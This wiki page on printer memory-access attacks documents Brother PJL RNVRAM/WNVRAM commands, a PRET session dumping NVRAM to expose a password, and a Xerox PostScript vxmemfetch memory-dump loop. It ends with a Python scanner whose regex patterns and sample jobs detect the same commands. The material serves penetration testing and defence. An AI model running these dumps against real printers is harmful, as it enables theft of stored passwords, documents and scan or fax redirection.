Difference between revisions of "Memory access"
Latest revision as of 11:34, 31 January 2017
If an attacker gains access to the printer's memory or NVRAM, she may be able to obtain sensitive data like passwords or printed documents. Write access to the memory might even lead to code execution.
PJL (Brother)
For PJL, a vendor-specific command documented in the Brother laser printer product specifications [1] and discussed in [2] allows one to ‘write data to or retrieve data from the specified address of the printer's NVRAM’. This functionality can be abused to access arbitrary NVRAM addresses using PJL as shown below, where X is an integer that can be incremented to dump the whole NVRAM.
@PJL RNVRAM ADDRESS = X # read byte at location X
@PJL WNVRAM ADDRESS = X DATA = Y # write byte Y to location X
This leads to disclosure of embedded web server passwords stored in the printer's NVRAM. Furthermore, if set, user PINs and passwords for POP3/SMTP as well as for FTP and Active Directory profiles can be obtained. For MFPs, the attacker can change the Scan-to-FTP settings so that scanned documents are delivered to an attacker-controlled FTP server, or she can exchange fax numbers in the address book so that faxes are sent to the attacker's fax number instead.
How to test for this attack?
The feasibility of this attack, which has been implemented as the nvram command in PRET, can be tested as follows:
./pret.py -q printer pjl
Connection to printer established
Welcome to the pret shell. Type help or ? to list commands.
printer:/> nvram dump
Writing copy to nvram/printer
................................................................................
................................................................................
............................................MyS3cretPassw0rd....................
................................................................................
Who can perform this attack?
Anyone who can print, for example through USB drive or cable, Port 9100 printing or Cross-site printing.
PostScript (Xerox)
Certain Xerox printer models have a proprietary PostScript vxmemfetch operator built in, which allows an attacker to read arbitrary memory addresses. Using a PostScript loop, this feature can easily be used to dump the whole memory [3], as shown below:
/counter 0 def 50000 {
/counter counter 1 add def
currentdict /RRCustomProcs /ProcSet findresource begin
begin counter 1 false vxmemfetch end end == counter
} repeat
How to test for this attack?
Open a raw network connection (using netcat [4], for example) to port 9100/tcp of the printer and send the PostScript code documented above.
Who can perform this attack?
Anyone who can print, for example through USB drive or cable, Port 9100 printing or Cross-site printing.
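As an added example (not part of the original page and not PRET's own code), a small Python scanner that inspects a captured print job for the Brother PJL RNVRAM/WNVRAM commands from the PJL section and for the vxmemfetch / RRCustomProcs references from the PostScript section, and raises an extra "dump" finding when many reads hit distinct addresses. The sample jobs and the DUMP_THRESHOLD value are constructed assumptions, not captures from a real device.

```python
import re
from dataclasses import dataclass
from typing import List

# Brother PJL NVRAM commands from this page (PJL keywords are case-insensitive).
PJL_NVRAM = re.compile(
    rb"@PJL\s+(?P<cmd>[RW]NVRAM)\b(?:\s+ADDRESS\s*=\s*(?P<addr>\d+))?", re.I)
# Xerox PostScript operator and resource names from this page.
PS_MEMFETCH = re.compile(rb"\bvxmemfetch\b|/RRCustomProcs\b")
DUMP_THRESHOLD = 16  # assumed: reads at this many distinct addresses look like a dump

@dataclass
class Finding:
    kind: str    # pjl_nvram_read | pjl_nvram_write | pjl_nvram_dump | ps_memfetch
    offset: int  # byte offset of the match in the job (-1 for aggregate findings)
    detail: str

def scan_print_job(job: bytes) -> List[Finding]:
    """Return every NVRAM/memory access indicator found in a raw print job."""
    findings, read_addrs = [], set()
    for m in PJL_NVRAM.finditer(job):
        kind = "pjl_nvram_read" if m.group("cmd").upper() == b"RNVRAM" else "pjl_nvram_write"
        if kind == "pjl_nvram_read" and m.group("addr") is not None:
            read_addrs.add(int(m.group("addr")))
        findings.append(Finding(kind, m.start(), m.group(0).decode("ascii", "replace")))
    if len(read_addrs) >= DUMP_THRESHOLD:  # X incremented across the NVRAM
        findings.append(Finding("pjl_nvram_dump", -1,
            f"{len(read_addrs)} RNVRAM reads spanning {min(read_addrs)}-{max(read_addrs)}"))
    for m in PS_MEMFETCH.finditer(job):
        findings.append(Finding("ps_memfetch", m.start(), m.group(0).decode("ascii")))
    return findings

# Constructed sample jobs (not real captures); UEL is the PJL universal exit language sequence.
UEL = b"\x1b%-12345X"
BENIGN_JOB = UEL + b"@PJL JOB NAME=\"report\"\r\n@PJL ENTER LANGUAGE=PCL\r\n\x1bEHello\r\n" + UEL
NVRAM_JOB = (UEL + b"".join(b"@PJL RNVRAM ADDRESS = %d\r\n" % x for x in range(32))
             + b"@PJL WNVRAM ADDRESS = 7 DATA = 65\r\n" + UEL)
PS_JOB = (UEL + b"@PJL ENTER LANGUAGE=POSTSCRIPT\r\n%!PS\n"
          b"/counter 0 def 50000 { /counter counter 1 add def\n"
          b"  currentdict /RRCustomProcs /ProcSet findresource begin\n"
          b"  begin counter 1 false vxmemfetch end end == counter } repeat\n" + UEL)

if __name__ == "__main__":
    for name, job in (("benign", BENIGN_JOB), ("nvram", NVRAM_JOB), ("postscript", PS_JOB)):
        print(name, [(f.kind, f.detail) for f in scan_print_job(job)])
```

Run it against jobs captured in front of port 9100 (or from a print server spool) to get per-job findings; the aggregate dump finding is what distinguishes a single configuration read from NVRAM enumeration.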
[1] Brother Laser Printer Technical Reference Guide, Ver. H, Brother Industries Ltd., 2004. http://www.undocprint.org/_media/formats/page_description_languages/brother_tech_reference_h_feb2004.pdf
[2] Hacking printers: for fun and profit, A. Costin, Hack.lu, 2010. http://andreicostin.com/papers/Conf%20-%20Hack.lu%20-%202010%20-%20Luxembourg%20-%20AndreiCostin_HackingPrintersForFunAndProfit.pdf
[3] PostScript: Danger Ahead?!, A. Costin, Hack in Paris, 2012
[4] Netcat – TCP/IP Swiss Army Knife, Hobbit, 1996